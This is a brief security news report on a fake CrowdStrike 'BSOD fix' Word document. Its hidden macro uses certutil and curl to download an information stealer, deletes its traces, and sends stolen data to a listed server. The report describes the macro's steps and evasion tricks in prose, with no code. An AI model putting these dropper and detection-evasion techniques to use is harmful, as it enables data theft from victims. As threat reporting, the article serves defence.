ThreatLabz has reported that hackers are taking advantage of a vulnerability in CrowdStrike to distribute malware through a counterfeit Microsoft Word file.
The document claims to provide assistance in resolving the bug, but in reality, it contains malicious code.
When users open it and enable macros, it downloads a harmful information-stealing program from the internet.
The malicious document appears to offer instructions on resolving a Blue Screen of Death (BSOD) issue that stems from a CrowdStrike bug.
However, there is a concealed macro within the document, which is essentially a small program that activates when the document is opened with macros enabled.
Here's a detailed breakdown of what the macro does:
Setting Up Variables: The macro sets up various variables to store paths for temporary files and URLs for downloading the malware. The file names, like curl.txt, curl.exe, mscorsvc.txt, and mscorsvc.dll, are deliberately selected to appear innocuous and seamlessly integrate with genuine system files.
Building Commands: The macro creates a set of commands that can be executed in the Windows command prompt (cmd.exe). These commands rely on two utilities: certutil and curl.
Executing Commands: The macro utilizes WScript.Shell to execute the command string it has constructed. The downloaded malware is able to run on the computer.
Cleaning Up: Once the malware is activated, the macro tries to get rid of the downloaded files such as curl.exe and curl.txt. This cleanup step aims to eliminate any traces of the attack, making it more challenging for users and security software to identify the incident.
After the malware is downloaded and executed, it starts to pilfer information from the compromised computer.
The stolen data is transmitted to the hacker's server via HTTP POST requests to the IP address 172.104.160[.]126:5000. This technique allows hackers to discreetly obtain stolen information without arousing suspicion.
The hackers employ various techniques to conceal their activities. They make their commands appear normal by utilizing legitimate tools such as certutil and curl.
They also employ techniques such as string concatenation to make their code more difficult to detect. These methods allow them to bypass security software.